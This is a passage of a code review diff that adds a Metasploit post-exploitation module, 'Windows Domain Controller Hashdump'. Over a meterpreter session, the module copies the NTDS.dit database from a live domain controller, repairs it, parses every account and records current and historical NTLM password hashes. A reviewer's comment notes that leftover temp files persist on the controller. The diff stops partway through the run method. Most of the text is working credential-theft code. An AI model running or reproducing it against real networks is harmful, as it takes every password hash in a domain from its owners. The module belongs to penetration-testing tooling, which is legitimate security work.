modules/post/windows/gather/credentials/domain_hashdump.rb

```diff
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'metasploit/framework/ntds/parser'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ShadowCopy
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Domain Controller Hashdump',
+      'Description'   => %q{
+        This module attempts to copy the NTDS.dit database from a live Domain Controller
+        and then parse out all of the User Accounts. It saves all of the captured password
+        hashes, including historical ones.
+  },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['theLightCosine'],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+  ))
+  end
+
+  def run
+    if preconditions_met?
+      ntds_file = copy_database_file
+      unless ntds_file.nil?
+        print_status "Repairing NTDS database after copy..."
+        print_status repair_ntds(ntds_file)
+        realm = domain_name
+        ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
+        ntds_parser.each_account do |ad_account|
+          print_good ad_account.to_s
+          report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
+          ad_account.nt_history.each_with_index do |nt_hash, index|
+            hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH
+            hash_string << ":#{nt_hash}"
+            report_hash(hash_string.downcase,ad_account.name, realm)
+          end
+        end
```

Comment:
Temp folders on windows aren't cleared on reboot like nix. This will likely persist for a long time on a DC.